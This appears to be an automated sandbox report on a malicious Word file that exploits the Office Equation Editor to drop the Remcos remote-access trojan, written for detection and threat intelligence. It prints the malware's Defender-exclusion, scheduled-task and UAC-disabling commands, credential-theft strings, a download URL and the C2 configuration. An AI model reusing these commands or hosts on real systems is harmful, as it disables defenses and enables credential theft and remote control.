Windows Analysis Report
Offer ZI-0428.doc

Overview

General Information

Sample name:Offer ZI-0428.doc
Analysis ID:1465260
MD5:dde9d7d091ac0cc1d35515d259d8ca6f
SHA1:c6e943143771fc3fd7c2c548f5fddcd6013d9302
SHA256:95be57795b850e5aa098c80a107bafdb581da7653d9b57b8f2d37b89880de224
Tags:doc

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Document exploit detected (process start blacklist hit)
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Searches for Windows Mail specific files
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3160 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3240 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • plugman23456.scr (PID: 3396 cmdline: "C:\Users\user\AppData\Roaming\plugman23456.scr" MD5: 28F77C9AF8CB3EA886714BBFC8326635)
        • powershell.exe (PID: 3452 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • powershell.exe (PID: 3484 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • schtasks.exe (PID: 3520 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • plugman23456.scr (PID: 3704 cmdline: "C:\Users\user\AppData\Roaming\plugman23456.scr" MD5: 28F77C9AF8CB3EA886714BBFC8326635)
          • plugman23456.scr (PID: 4068 cmdline: C:\Users\user\AppData\Roaming\plugman23456.scr /stext "C:\Users\user\AppData\Local\Temp\bhyzucyduxfccvbqstsgmdbbressguvzg" MD5: 28F77C9AF8CB3EA886714BBFC8326635)
          • plugman23456.scr (PID: 4080 cmdline: C:\Users\user\AppData\Roaming\plugman23456.scr /stext "C:\Users\user\AppData\Local\Temp\ejlrnu" MD5: 28F77C9AF8CB3EA886714BBFC8326635)
          • plugman23456.scr (PID: 2100 cmdline: C:\Users\user\AppData\Roaming\plugman23456.scr /stext "C:\Users\user\AppData\Local\Temp\odrcnntyd" MD5: 28F77C9AF8CB3EA886714BBFC8326635)
    • EQNEDT32.EXE (PID: 3480 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • taskeng.exe (PID: 3832 cmdline: taskeng.exe {8CF74EAD-4204-4C1F-8614-11C7F9468804} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • znlzneAxBVd.exe (PID: 3908 cmdline: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe MD5: 28F77C9AF8CB3EA886714BBFC8326635)
      • powershell.exe (PID: 3948 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • powershell.exe (PID: 3976 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • schtasks.exe (PID: 4052 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpE15.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • znlzneAxBVd.exe (PID: 3252 cmdline: "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe" MD5: 28F77C9AF8CB3EA886714BBFC8326635)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "antfly50.sytes.net:1980:1", "Assigned name": "sPITTT", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-BW3KDF", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings
Offer ZI-0428.doc | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with a non-standard version and embedding one of the objects mostly observed in exploit documents. | ditekSHen
  • 0x15e4b:$obj2: \objdata
  • 0x15e61:$obj3: \objupdate
  • 0x15e26:$obj6: \objlink
Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
Source | Rule | Description | Author | Strings
0000000C.00000002.885917708.00000000006F4000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000019.00000002.396020237.0000000000914000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000C.00000002.886068183.0000000000E9F000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000C.00000002.885963497.0000000000748000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
Source | Rule | Description | Author | Strings
25.2.znlzneAxBVd.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
25.2.znlzneAxBVd.exe.400000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
25.2.znlzneAxBVd.exe.400000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6c4a8:$a1: Remcos restarted by watchdog!
  • 0x6ca20:$a3: %02i:%02i:%02i:%03i
25.2.znlzneAxBVd.exe.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
  • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6656c:$str_b2: Executing file:
  • 0x675ec:$str_b3: GetDirectListeningPort
  • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x67118:$str_b7: \update.vbs
  • 0x66594:$str_b9: Downloaded file:
  • 0x66580:$str_b10: Downloading file:
  • 0x66624:$str_b12: Failed to upload file:
  • 0x675b4:$str_b13: StartForward
  • 0x675d4:$str_b14: StopForward
  • 0x67070:$str_b15: fso.DeleteFile "
  • 0x67004:$str_b16: On Error Resume Next
  • 0x670a0:$str_b17: fso.DeleteFolder "
  • 0x66614:$str_b18: Uploaded file:
  • 0x665d4:$str_b19: Unable to delete:
  • 0x67038:$str_b20: while fso.FileExists("
  • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
25.2.znlzneAxBVd.exe.400000.0.raw.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
  • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x6637c:$s1: CoGetObject
  • 0x66390:$s1: CoGetObject
  • 0x663ac:$s1: CoGetObject
  • 0x70338:$s1: CoGetObject
  • 0x6633c:$s2: Elevation:Administrator!new:

Exploits

Source: Network Connection | Author: Joe Security | Data: DestinationIp: 31.192.235.145, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3240, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49164

System Summary

Source: Network Connection | Author: Max Altgelt (Nextron Systems) | Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49164, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3240, Protocol: tcp, SourceIp: 31.192.235.145, SourceIsIpv6: false, SourcePort: 80
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\plugman23456.scr", ParentImage: C:\Users\user\AppData\Roaming\plugman23456.scr, ParentProcessId: 3396, ParentProcessName: plugman23456.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr", ProcessId: 3452, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io | Data: Command: "C:\Users\user\AppData\Roaming\plugman23456.scr", CommandLine: "C:\Users\user\AppData\Roaming\plugman23456.scr", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\plugman23456.scr, NewProcessName: C:\Users\user\AppData\Roaming\plugman23456.scr, OriginalFileName: C:\Users\user\AppData\Roaming\plugman23456.scr, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3240, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\plugman23456.scr", ProcessId: 3396, ProcessName: plugman23456.scr
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\plugman23456.scr", ParentImage: C:\Users\user\AppData\Roaming\plugman23456.scr, ParentProcessId: 3396, ParentProcessName: plugman23456.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr", ProcessId: 3452, ProcessName: powershell.exe
Source: File created | Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3240, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\plug[1].scr
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\plugman23456.scr", ParentImage: C:\Users\user\AppData\Roaming\plugman23456.scr, ParentProcessId: 3396, ParentProcessName: plugman23456.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp", ProcessId: 3520, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\plugman23456.scr", ParentImage: C:\Users\user\AppData\Roaming\plugman23456.scr, ParentProcessId: 3396, ParentProcessName: plugman23456.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp", ProcessId: 3520, ProcessName: schtasks.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3240, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\plug[1].scr
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3240, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\plugman23456.scr", ParentImage: C:\Users\user\AppData\Roaming\plugman23456.scr, ParentProcessId: 3396, ParentProcessName: plugman23456.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr", ProcessId: 3452, ProcessName: powershell.exe
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3160, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3452, TargetFilename: C:\Users\user\AppData\Local\Temp\vkidhas2.ame.ps1

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\plugman23456.scr", ParentImage: C:\Users\user\AppData\Roaming\plugman23456.scr, ParentProcessId: 3396, ParentProcessName: plugman23456.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp", ProcessId: 3520, ProcessName: schtasks.exe

Stealing of Sensitive Information

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\plugman23456.scr, ProcessId: 3704, TargetFilename: C:\ProgramData\remcos\logs.dat

No Snort rule has matched

AV Detection

Source: http://sinopecllc.top/plug.scriiC: | Avira URL Cloud: Label: malware
Source: antfly50.sytes.net | Avira URL Cloud: Label: malware
Source: http://sinopecllc.top/plug.scr | Avira URL Cloud: Label: malware
Source: http://sinopecllc.top/plug.scrC: | Avira URL Cloud: Label: malware
Source: http://sinopecllc.top/plug.scrj | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\plug[1].scr | Avira: detection malicious, Label: HEUR/AGEN.1362875
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Avira: detection malicious, Label: HEUR/AGEN.1362875
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Avira: detection malicious, Label: HEUR/AGEN.1362875
Source: 0000000C.00000002.885917708.00000000006F4000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "antfly50.sytes.net:1980:1", "Assigned name": "sPITTT", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-BW3KDF", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: Offer ZI-0428.doc | ReversingLabs: Detection: 47%
Source: Offer ZI-0428.doc | Virustotal: Detection: 40%
Source: Yara match | File source: 25.2.znlzneAxBVd.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.plugman23456.scr.34f9570.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.znlzneAxBVd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.plugman23456.scr.3572190.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.plugman23456.scr.3572190.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.plugman23456.scr.34f9570.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.885917708.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.396020237.0000000000914000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.886068183.0000000000E9F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.885963497.0000000000748000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.378816554.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: plugman23456.scr PID: 3396, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: plugman23456.scr PID: 3704, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: znlzneAxBVd.exe PID: 3252, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\plug[1].scr | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Code function: 21_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,21_2_00404423
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,25_2_00433837
Source: plugman23456.scr, 00000005.00000002.378816554.00000000034F9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Source: Yara match | File source: 25.2.znlzneAxBVd.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.plugman23456.scr.34f9570.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.znlzneAxBVd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.plugman23456.scr.3572190.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.plugman23456.scr.3572190.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.plugman23456.scr.34f9570.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.378816554.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: plugman23456.scr PID: 3396, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: znlzneAxBVd.exe PID: 3252, type: MEMORYSTR
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 31.192.235.145 Port: 80
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\plugman23456.scr
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\plugman23456.scr
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                  Privilege Escalation

                  barindex
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_004074FD _wcslen,CoGetObject,25_2_004074FD
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Code function: 12_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,12_2_100010F1
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Code function: 12_2_10006580 FindFirstFileExA,12_2_10006580
